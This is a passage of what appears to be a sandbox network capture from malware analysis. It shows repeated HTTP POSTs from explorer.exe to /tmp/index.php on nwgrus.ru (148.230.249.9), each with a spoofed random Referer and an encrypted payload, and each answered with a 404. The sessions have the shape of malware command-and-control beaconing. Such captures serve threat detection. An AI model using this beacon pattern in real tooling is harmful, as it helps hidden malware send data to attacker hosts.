/tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	65080	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:10.477514029 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vybahkmcxnemgwbs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: nwgrus.ru
Oct 13, 2024 18:28:10.477514029 CEST	241	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 20 55 c7 f9 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu U_vd{L\#6mYaC:"*KGR@a(0o+-/_[.rWC.-XDl'ZiBv{`Xz
Oct 13, 2024 18:28:11.447698116 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	65082	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:11.458384037 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mmuqkomgbgwmrgx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 139 Host: nwgrus.ru
Oct 13, 2024 18:28:11.458384037 CEST	139	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 55 2c c2 8c Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuU,GgWXzYR>#we G+;ca+&S
Oct 13, 2024 18:28:12.403850079 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	65092	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:12.412687063 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lpffbcdshmrgy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: nwgrus.ru
Oct 13, 2024 18:28:12.412687063 CEST	183	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 3a 2f e7 9f Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu:/%fYe_aC}S9%-U=@>#!=e$#[z&'& M8#
Oct 13, 2024 18:28:13.359931946 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	65099	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:13.370277882 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://espuvwcpdtgkhr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: nwgrus.ru
Oct 13, 2024 18:28:13.370277882 CEST	200	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 7a 33 e4 a2 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuz3&lmfD'!1,9~0Pp}b>=7caTnO&@t3N/\UB<gq\1
Oct 13, 2024 18:28:14.317760944 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	65105	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:14.879990101 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qjhgyfigxhdukho.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 288 Host: nwgrus.ru
Oct 13, 2024 18:28:14.879990101 CEST	288	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 7e 03 af e2 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu~Puz}hM74~9sl_s&\5Tl0ZUa!7+(c' EQ6ugRSE35p`QI$ \G+
Oct 13, 2024 18:28:15.827591896 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:15 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	65115	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:15.840307951 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qbdfqckmklgu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: nwgrus.ru
Oct 13, 2024 18:28:15.840347052 CEST	330	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 58 5e e4 8d Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuX^l0RXihIX+dMeS0RXzTVs_;L02i`6yjBV.Y#}qBDJ'_vFYvy^n
Oct 13, 2024 18:28:16.790606976 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	65122	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:16.804027081 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rccfvowoiuloot.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 368 Host: nwgrus.ru
Oct 13, 2024 18:28:16.804059982 CEST	368	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 56 42 bd 8d Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuVBXVv{yGj/yprBUY4VJ.:JUN!HJCJ4(m:ML(}mSC<AV7hggfGDoS^
Oct 13, 2024 18:28:17.753078938 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	65128	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:17.812771082 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oxmwgvysvdebn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: nwgrus.ru
Oct 13, 2024 18:28:17.812810898 CEST	188	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 75 37 a0 aa Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[*k,vuu7D PI/SOFId=E#]Cg)[<~WRZF`:0+7S
Oct 13, 2024 18:28:18.774601936 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	65134	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:18.784312963 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://liapcosrblojgddt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: nwgrus.ru
Oct 13, 2024 18:28:18.784347057 CEST	189	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 44 48 d6 aa Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[+k,vuDHRN!s~:u}rz0Z!G6%X[JK~3n@r5^0m'B
Oct 13, 2024 18:28:19.727567911 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered 